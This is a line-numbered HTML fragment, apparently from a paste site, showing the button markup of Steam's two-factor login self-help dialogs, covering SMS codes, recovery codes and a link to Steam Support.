  897. <div class="auth_button_h5">Send me the text message</div>
  898. </div>
  899. <div class="auth_button" data-modalstate="selfhelp_nosms">
  900. <div class="auth_button_h3">I can't</div>
  901. <div class="auth_button_h5">because I no longer have access to that phone number</div>
  902. </div>
  903. </div>
  904. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_sms_remove_entercode" style="display: none;">
  905. <div class="auth_button leftbtn" data-modalstate="selfhelp_sms_remove_checkcode">
  906. <div class="auth_button_h3">Submit</div>
  907. <div class="auth_button_h5">I entered the code above</div>
  908. </div>
  909. <div class="auth_button" data-modalstate="selfhelp_nosms">
  910. <div class="auth_button_h3">Please help</div>
  911. <div class="auth_button_h5">I'm not receiving the text message</div>
  912. </div>
  913. </div>
  914. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_sms_remove_incorrectcode" style="display: none;">
  915. <div class="auth_button leftbtn" data-modalstate="selfhelp_sms_remove_checkcode">
  916. <div class="auth_button_h3">Submit</div>
  917. <div class="auth_button_h5">I re-entered the code. Let's try again.</div>
  918. </div>
  919. <div class="auth_button" data-modalstate="selfhelp_nosms">
  920. <div class="auth_button_h3">Please help</div>
  921. <div class="auth_button_h5">I'm not receiving the text message</div>
  922. </div>
  923. </div>
  924. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_twofactor_removed" style="display: none;">
  925. <div class="auth_button leftbtn" data-modalstate="selfhelp_sms_remove_complete">
  926. <div class="auth_button_h3">Log in</div>
  927. <div class="auth_button_h5">with the mobile authenticator removed</div>
  928. </div>
  929. </div>
  930. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_twofactor_replaced" style="display: none;">
  931. <div class="auth_button leftbtn" data-modalstate="selfhelp_sms_remove_complete">
  932. <div class="auth_button_h3">Log in</div>
  933. <div class="auth_button_h5">to the Steam Mobile app</div>
  934. </div>
  935. </div>
  936. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_nosms" style="display: none;">
  937. <div class="auth_button leftbtn" data-modalstate="selfhelp_rcode">
  938. <div class="auth_button_h3">Yes</div>
  939. <div class="auth_button_h5">I have the recovery code that begins with 'R'</div>
  940. </div>
  941. <div class="auth_button" data-modalstate="selfhelp_couldnthelp">
  942. <div class="auth_button_h3">No</div>
  943. <div class="auth_button_h5">I don't have a code like that</div>
  944. </div>
  945. </div>
  946. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_rcode" style="display: none;">
  947. <div class="auth_button leftbtn" data-modalstate="selfhelp_rcode_checkcode">
  948. <div class="auth_button_h3">Submit</div>
  949. <div class="auth_button_h5">my recovery code</div>
  950. </div>
  951. <div class="auth_button" data-modalstate="selfhelp_couldnthelp">
  952. <div class="auth_button_h3">Please help</div>
  953. <div class="auth_button_h5">I think I need assistance from Steam Support...</div>
  954. </div>
  955. </div>
  956. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_rcode_incorrectcode" style="display: none;">
  957. <div class="auth_button leftbtn" data-modalstate="selfhelp_rcode_checkcode">
  958. <div class="auth_button_h3">Submit</div>
  959. <div class="auth_button_h5">I re-entered the code. Let's try again.</div>
  960. </div>
  961. <div class="auth_button" data-modalstate="selfhelp_couldnthelp">
  962. <div class="auth_button_h3">Please help</div>
  963. <div class="auth_button_h5">I think I need assistance from Steam Support...</div>
  964. </div>
  965. </div>
  966. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_rcode_incorrectcode_exhausted" style="display: none;">
  967. <div class="auth_button" data-modalstate="selfhelp_couldnthelp">
  968. <div class="auth_button_h3">Please help</div>
  969. <div class="auth_button_h5">I think I need assistance from Steam Support...</div>
  970. </div>
  971. </div>
  972. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_couldnthelp" style="display: none;">
  973. <a class="auth_button leftbtn" href="https://help.steampowered.com/">
  974. <div class="auth_button_h3">Contact us</div>
  975. <div class="auth_button_h5">for help with account access</div>
  976. </a>
  977. </div>
  978. <div class="auth_buttonset waiting" id="login_twofactorauth_buttonset_waiting" style="display: none;">
  979. </div>
  980. </div>
  981. <div style="display: none;">
  982. <input type="submit">
  983. </div>
  984. </div>
  985. </div></div></div></div></div><div class="miniprofile_hover" style="display: none;"><div class="shadow_ul"></div><div class="shadow_top"></div><div class="shadow_ur"></div><div class="shadow_left"></div><div class="shadow_right"></div><div class="shadow_bl"></div><div class="shadow_bottom"></div><div class="shadow_br"></div><div class="miniprofile_hover_inner shadow_content"></div><div class="hover_arrow left miniprofile_arrow"><div class="miniprofile_arrow_inner"></div></div><div class="hover_arrow right miniprofile_arrow"><div class="miniprofile_arrow_inner"></div></div></div>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement